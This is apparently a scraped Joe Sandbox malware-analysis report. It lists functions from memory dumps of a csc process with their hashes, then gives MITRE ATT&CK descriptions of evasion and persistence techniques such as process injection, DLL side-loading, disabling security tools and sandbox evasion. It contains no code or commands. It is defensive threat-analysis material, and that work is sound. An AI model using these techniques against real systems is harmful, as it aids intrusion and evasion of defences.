Opcode Fuzzy Hash: b50528f6ed4e6295218d50a5f1829b366f64499b0b1318115d01e3484e2476ea
Instruction Fuzzy Hash: 56F06970A05A248FC780CF60C944A89BBB2EB48316F1101E6D80DA7315CA34ADC1CF80

Function 09B97820 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b7d7b49089a371afd9b72a63afb447267e4d81aa5a8cdeaabd876792c98e605
Instruction ID: cedafe90a12fbaa4dcba888d1233554acd88ac875bdb4560fbc2311f87063280
Opcode Fuzzy Hash: 4b7d7b49089a371afd9b72a63afb447267e4d81aa5a8cdeaabd876792c98e605
Instruction Fuzzy Hash: 58F037316002478FC7159B29E84899FFBA6EFC1314714D53FE11A8F225DA719947CBD4

Function 09B902C8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e991b41bb0cb2b5d23dafbbab358b3bb869575c8e7b4de895eb8d201219b32
Instruction ID: 28f6aa95de9eb8dff43e9bcb4f953ec7b6fa0207006a308ff87c601a16375e57
Opcode Fuzzy Hash: 77e991b41bb0cb2b5d23dafbbab358b3bb869575c8e7b4de895eb8d201219b32
Instruction Fuzzy Hash: 4FF08271A19654BFDB09CF64E048BEDBFF6EB84211F0480AAE045E7191D7748685CB85

Function 09B902D8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457d40a16be0bebdc3f32d34190e6e76d2723cca43cf19a56313d2261b5e4428
Instruction ID: 7d7d99ff6d09f95aa61826213cb7dc836fca139adaae5bb6c3d2c397ca37573b
Opcode Fuzzy Hash: 457d40a16be0bebdc3f32d34190e6e76d2723cca43cf19a56313d2261b5e4428
Instruction Fuzzy Hash: A3F09B31A09618BFCF09DF54D448BDDBFF6DB84220F0480A9E045E3694DB745AC5CB85

Function 09BAC0EB Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ee4d4af3468192235893670a06d13c791f647336feb4e00c6f7683f631ff97
Instruction ID: b792d9b82c133721933315354a49fa9f5ca372836b62e051818bc49f193ace2e
Opcode Fuzzy Hash: 02ee4d4af3468192235893670a06d13c791f647336feb4e00c6f7683f631ff97
Instruction Fuzzy Hash: 38F03978B01100AFC758EB78D098A6D36E2AFCD351B8504A9E44AEB3D0EF349C818B56

Function 09B97830 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b735f6b8a01d6a9c5ae3c7d5ffb4c216f501afcf521842404d00c8fcf3ddfe91
Instruction ID: 37550ca1e4479742ffbc7f7d327779e171dc0bd559d20092f0ec047f6b359a17
Opcode Fuzzy Hash: b735f6b8a01d6a9c5ae3c7d5ffb4c216f501afcf521842404d00c8fcf3ddfe91
Instruction Fuzzy Hash: 02E01A316002079FC7109A2AE88484FFB9AEEC4264710DA3AA21A8B225DA70ED478694

Function 09BA6992 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e83b16b9292c8a5c90c2d150cb00866c007365c22ec9e47e5ed9c7d7e9b4869
Instruction ID: 50e55827fbfa278a98d49aa89fb4338a6d9291f925d276f925abf2dd48eed79f
Opcode Fuzzy Hash: 6e83b16b9292c8a5c90c2d150cb00866c007365c22ec9e47e5ed9c7d7e9b4869
Instruction Fuzzy Hash: 90F03071D08224DFEB208E14CD45B5DB7B1BF04361F4540E9EA49672A0D774AE85CB42

Function 09B91F68 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3975b11f4b80f85640f66cbbb704810c17caf43c0a76b70b5d47aa24f7e263
Instruction ID: a0d6cacb1b435992e6d50de79c33c601eeadf0f25798f6368ce001a592fdf7be
Opcode Fuzzy Hash: 9b3975b11f4b80f85640f66cbbb704810c17caf43c0a76b70b5d47aa24f7e263
Instruction Fuzzy Hash: B0E0863173D3199BDF20696999417A132899B4A7A1F5140BDE6095B3C0EA61E8418761

Function 09BAB1B1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d57a03ec401ffc91e57b1edf4b21d549b81b684b8634c8dff99453375a155b
Instruction ID: 707a45c50d55cf08b1be003e463bfc55f28b6522b1a4dc324f98184041d8c13a
Opcode Fuzzy Hash: f0d57a03ec401ffc91e57b1edf4b21d549b81b684b8634c8dff99453375a155b
Instruction Fuzzy Hash: 1AE0D834F0816EDFDB184F25E50926A3735FBC4371F1581BDD9059B384DA3888415B81

Function 09BA612F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17e3c171b5772796cecf9e6ee6676cda61d74c7c53878d45888cd3d1bfca96d9
Instruction ID: dc82356338855945ec1ade8976ca6fc572544cece4229986a6d843c4857bd573
Opcode Fuzzy Hash: 17e3c171b5772796cecf9e6ee6676cda61d74c7c53878d45888cd3d1bfca96d9
Instruction Fuzzy Hash: 92F03934A04220CFCB64EB24C840B5DB3B2BF48361F4180E8E906A7360EB30ED418B91

Function 09BA95D1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a51e14b3fd1a85ea68aabba2ba9ebd98daf74b8bb9ba37785bb7b8f75f40c2a
Instruction ID: 8aaf6d7ce97039d8343494243ae6558f8b112f802e10b3d99e2cba2cb1397f08
Opcode Fuzzy Hash: 6a51e14b3fd1a85ea68aabba2ba9ebd98daf74b8bb9ba37785bb7b8f75f40c2a
Instruction Fuzzy Hash: 89E02CB280A388AFC742CBB4CA112D9FBB8AE42180B2001FAD808C7211FE318A00C350

Function 09BA95E0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53cad833f9ec8f748327634abcf0baf0e158dcc67e35a4317cb4f890b84363e2
Instruction ID: 150536e9d13ed699d74ddfe92318abf60c37f24533e79d7051189e79735f1bf8
Opcode Fuzzy Hash: 53cad833f9ec8f748327634abcf0baf0e158dcc67e35a4317cb4f890b84363e2
Instruction Fuzzy Hash: 59D01736A1520CAFCB10DEB5A9055AAB7ACEB05155B1005E9EC0DC3200FE32DA109790

Function 09F135E5 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660835172.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f10000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e9ab034eb507a8b2cac5031695547697245333114e119011bdcbd8dd02d708
Instruction ID: 20a7609811a73549a908123e38e7c1e53576d1f78f810b1c08c73132466ecefa
Opcode Fuzzy Hash: f4e9ab034eb507a8b2cac5031695547697245333114e119011bdcbd8dd02d708
Instruction Fuzzy Hash: FFF0D474A05614CFC750CB28C994A497BB1FF49324F1541D5E519AB3A2C7359E80CF40

Function 09B98E97 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb66405458d48bdd23c485a8dee9b621edbebde85ec561a538e59b8dde38ff58
Instruction ID: 07c98c662e8c1846c11aa684ca5e361085bd8c5903867bba6bd92bc52f0ced3f
Opcode Fuzzy Hash: fb66405458d48bdd23c485a8dee9b621edbebde85ec561a538e59b8dde38ff58
Instruction Fuzzy Hash: 49E05E30714A639FEF26962AE952B6B7BD5DFC5300B00453AA842C7799FB20D9074781

Function 09F106A7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660835172.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f10000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bbc56c9ceae03a6742b2ca5b8f02eb07b63d38a8767110bc2cb1e4387def930
Instruction ID: f405d7833930aa9c93c5356ddcad29f5a07bb48821c1376089f8ebd1e10a27f2
Opcode Fuzzy Hash: 6bbc56c9ceae03a6742b2ca5b8f02eb07b63d38a8767110bc2cb1e4387def930
Instruction Fuzzy Hash: 86F01F78A06614DFC754CF28C884A98BBB2BF4D315F1541D9E40AA7761CB35AD80CF01

Function 09F12829 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660835172.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f10000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34df1bb9be58f08ab6d7107a33d07015090157caf89bded1ae78c714d97828b0
Instruction ID: 0fc85f289144b27034118bfa1def92aaae5d366fdd6ba5ed539fdc195298046d
Opcode Fuzzy Hash: 34df1bb9be58f08ab6d7107a33d07015090157caf89bded1ae78c714d97828b0
Instruction Fuzzy Hash: 10F06278A05A28CFC754CF24C984A89B7B1FB48316F1010D5D80DA7360D678AEC5CF41

Function 09BADA30 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f9baa01cc304aefb91dfe0eff61f815c630e622ecc6023e8353a9ad8b17ef8
Instruction ID: d8a55ca9c802dcd30b5eec9165bb7a814131d5071f9bab987a4930b145d234cb
Opcode Fuzzy Hash: 19f9baa01cc304aefb91dfe0eff61f815c630e622ecc6023e8353a9ad8b17ef8
Instruction Fuzzy Hash: 95E08CB0A01109EFCB00DFA4E60069DB7B9DB48200F1042A9880C97744EA315E009B80

Function 09BAC993 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d902dc7f7ca9819b1fd4122ea9af3843fe1cf7825251479e2eadfc21075f1835
Instruction ID: 709fd7dac46f1914499328324a4bd932cb33e48b24942ca6bb1ef487304cb551
Opcode Fuzzy Hash: d902dc7f7ca9819b1fd4122ea9af3843fe1cf7825251479e2eadfc21075f1835
Instruction Fuzzy Hash: 14D05E31C090A7EBEB145B21F9497997B30EB44365F0581B9D456A7381E6384C859B91

Function 09B9B288 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5714f17dbc1944d4413a6875f770857af09889f47798f578d80ee6a335da6b1c
Instruction ID: 628e02172a1d5c6fcec332598f39e91685e43ffbc83f88103f796a5fc8c66a81
Opcode Fuzzy Hash: 5714f17dbc1944d4413a6875f770857af09889f47798f578d80ee6a335da6b1c
Instruction Fuzzy Hash: 67D05231900208AFC3088F28D0458A83BB0BF1A210B2280AAE8098B233D2318C64CB02

Function 09BA6462 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02304025671230f73f0c9420a94ab57f83cc275f3a4ccb7c1f9b12b451f35609
Instruction ID: 97353ee2a4a8702a601dd27e25fd6847ac0ba7b4b12ff2cb5e8d9e3b04431e06
Opcode Fuzzy Hash: 02304025671230f73f0c9420a94ab57f83cc275f3a4ccb7c1f9b12b451f35609
Instruction Fuzzy Hash: DFD09235A44314DFEB60CF54CD41F5ABBB2BF08710F5140D4E609AB2A1D771AD818F41

Function 09B9E988 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d762617edf3cd85c410a84c4ba8f5478138612bb97b9b6a1364b0cab023e5af
Instruction ID: 9497e1218749cfa0d30160d174fa1b350a336c97b9f70cf9d9fed9dc4750b55e
Opcode Fuzzy Hash: 6d762617edf3cd85c410a84c4ba8f5478138612bb97b9b6a1364b0cab023e5af
Instruction Fuzzy Hash: 77D0C9765442449FD704CB28E409B9ABFA9EF99311F2145AAE9858B272E672C960CE01

Function 09BA409D Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72baf217373b1aa10f4f977fb997a27151a880c837aca5fdefef21433c335911
Instruction ID: e50749b68fc92fdf9db45e46472a3f2bd47e493f52cf5e8edd2a3022db7ae82c
Opcode Fuzzy Hash: 72baf217373b1aa10f4f977fb997a27151a880c837aca5fdefef21433c335911
Instruction Fuzzy Hash: 8FD0123070C094CBD710AB94DA8A63DB3F3FF883A4F404091E8029B2A5DBA4C8429B06

Function 09BAD3B0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057a3971aa4546f6d1c3d6f5936ce7425c28dd6a3a8f5fd34e900843c850ef85
Instruction ID: 3e41d6482755d42de1ff2d31604bbe023924bd00e583b8d3ce61509448b124ed
Opcode Fuzzy Hash: 057a3971aa4546f6d1c3d6f5936ce7425c28dd6a3a8f5fd34e900843c850ef85
Instruction Fuzzy Hash: 06C08C2104E3C82FC78313B414242837F38DD07418BAE00CBE8CCCA043E205148BC712

Function 09BA6387 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f34377f3d9940da147cd51292d274301f65a67e82c496ad55dfbd729e92511
Instruction ID: 806485cfd359bdd346080812890315d57b1f6323a3dbd45b6374b200f9a81169
Opcode Fuzzy Hash: f4f34377f3d9940da147cd51292d274301f65a67e82c496ad55dfbd729e92511
Instruction Fuzzy Hash: 37D092B1C4CA60CFCB249B28C98A349B7B1FB89340F5150F7D84A9A166C3755D11AF99

Function 09BA16C0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a9403c9e72295b2792cf3b7addd649919cf8e8eb9012d5f47accb4c43393be
Instruction ID: ec261b91aee52ec2ecb30197b918581e114281d255c0bc098a85c25252741d5c
Opcode Fuzzy Hash: 37a9403c9e72295b2792cf3b7addd649919cf8e8eb9012d5f47accb4c43393be
Instruction Fuzzy Hash: ECC09B7514C608D6C56537E0700F5757F5A9A055267405055E41D419805EBE146445BB

Function 09B91C00 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a196214e942cdeb2648df5273919ea9ef685974d981592f0082d2fab10f6e9c8
Instruction ID: b79d7f114c8ca8aef5af71acbc04a15d3d187d1db0dd9956ff9ec0b390fbc9af
Opcode Fuzzy Hash: a196214e942cdeb2648df5273919ea9ef685974d981592f0082d2fab10f6e9c8
Instruction Fuzzy Hash: 23D0C9314082D19FC3478720951A058BFA0EF8320071984A590C08A47AD7364855C711

Function 09B9B298 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 09BA958C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40507a0e176f55fb951d3f78214702fb7787cb5ef690b60b5f5918738e1fadbe
Instruction ID: 5c29eaaa88bc9f2f2774e2f99d5076133b447624c6df8c47b09d85847b1a3c14
Opcode Fuzzy Hash: 40507a0e176f55fb951d3f78214702fb7787cb5ef690b60b5f5918738e1fadbe
Instruction Fuzzy Hash: 92B01237B00019C6CB00D6C8F4404DCFB30DBE4332F005433C700620408B3116BACB65

Function 09BA16C8 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 626476f5a69a044c84598be5e6f6ed83c025b9ddaf21d62aaf00c82db807fa6b
Instruction ID: 66d061595367850ae259609eb5c223703befec1cb374534899bd6c6d9f983788
Opcode Fuzzy Hash: 626476f5a69a044c84598be5e6f6ed83c025b9ddaf21d62aaf00c82db807fa6b
Instruction Fuzzy Hash: 51A0113200C20CCA828233E0300FA083B0C8A0882AB802080E82C000C02EBE20208AAB

Function 09F16B38 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660835172.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f10000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d7495e9eb3d0bd95dce6661e4d4ce7793790500c4b02dd00cb34d077e907d2f
Instruction ID: 96bf6d956e9c23cd54f2d1fa2442bf0d56abaa0a0c773bfae0ed1e4370dc3c2f
Opcode Fuzzy Hash: 4d7495e9eb3d0bd95dce6661e4d4ce7793790500c4b02dd00cb34d077e907d2f
Instruction Fuzzy Hash: 56C09B352092C44FD7014758C4647D43F729FDF331F181195D441577D6C5555CD1C762

Function 09BAD3C0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f776cac303aaf9022b436861d17d20acc2c889715e50d54728746d4ab2d9865
Instruction ID: b8afdb045a121e1a572c613b6e4c3543377465d648fc0d6af80535cdc3d3669d
Opcode Fuzzy Hash: 4f776cac303aaf9022b436861d17d20acc2c889715e50d54728746d4ab2d9865
Instruction Fuzzy Hash: CA90023104961CAB878027A5740A595776CE544926BC00151A50D415415A5964905595

Function 09B98E90 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c289d1a75c4e2078ed7eece625d375a455ccfb991979859db5c7165dc2264d23
Instruction ID: f296156a37f734eb8c5fb3f75c60dde880e2011a243997f555fe8d476a0efc92
Opcode Fuzzy Hash: c289d1a75c4e2078ed7eece625d375a455ccfb991979859db5c7165dc2264d23
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
